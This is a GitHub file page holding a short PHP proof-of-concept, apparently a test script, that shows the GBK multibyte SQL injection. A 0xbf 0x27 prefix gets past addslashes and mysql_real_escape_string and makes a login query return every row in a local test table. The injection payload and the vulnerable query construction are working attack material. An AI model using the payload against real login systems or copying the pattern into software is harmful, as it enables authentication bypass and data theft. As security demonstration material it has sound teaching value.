-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathsql_inject_test.php
More file actions
44 lines (27 loc) · 1 KB
/
sql_inject_test.php
File metadata and controls
44 lines (27 loc) · 1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
header('Content-Type: text/html; charset=GBK');
$input = chr(0xbf) . chr(0x27) . ' OR username = username; /*';
$value = addslashes($input);
$sql = "SELECT * FROM users WHERE username='{$value}' AND password='123123';";
echo $value;
echo '<br>';
echo $sql;
echo '<br>';
$c = mysql_connect("localhost", "root", "");
mysql_select_db("test", $c);
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);
// change our character set
mysql_set_charset('gbk',$c);
$value = mysql_real_escape_string($input, $c);
$sql = "SELECT * FROM users WHERE username='{$value}' AND password='123123';";
echo $value;
echo '<br>';
echo $sql;
echo '<br>';
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records
?>